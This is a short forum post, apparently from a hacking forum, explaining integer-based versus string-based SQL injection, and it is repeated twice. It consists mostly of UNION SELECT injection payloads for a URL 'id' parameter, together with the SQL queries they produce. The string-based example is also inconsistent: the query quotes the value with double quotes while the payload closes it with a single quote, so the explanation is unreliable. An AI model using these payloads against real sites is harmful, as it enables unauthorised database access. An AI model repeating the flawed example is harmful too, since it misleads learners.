Hi friends this one i had posted a question on hackforums about difference between string based and integer based SQL injection it can be explained as follows
integer
so the injection would be
?id=10 union select 1,2,3--
finallly you get
SELECT * FROM pages WHERE page_id=10 union select 1,2,3-- order by title limit 1,1
string
so the injection would be
?id=10' union select 1,2,3--+
final:
select * from pages where page_id="10"' union select 1,2,3--+ order by title limit 1,1
so in integer based SQL injection you dont have to put a ' and in string based SQL injection you have to put a ' and a + sign at the end
the original post here
enjoy
integer
SELECT * FROM pages WHERE page_id=10 [inject] order by title limit 1,1
?id=10 union select 1,2,3--
finallly you get
SELECT * FROM pages WHERE page_id=10 union select 1,2,3-- order by title limit 1,1
string
SELECT * FROM pages WHERE page_id="10" [inject] order by title limit 1,1
?id=10' union select 1,2,3--+
final:
select * from pages where page_id="10"' union select 1,2,3--+ order by title limit 1,1
so in integer based SQL injection you dont have to put a ' and in string based SQL injection you have to put a ' and a + sign at the end
the original post here
enjoy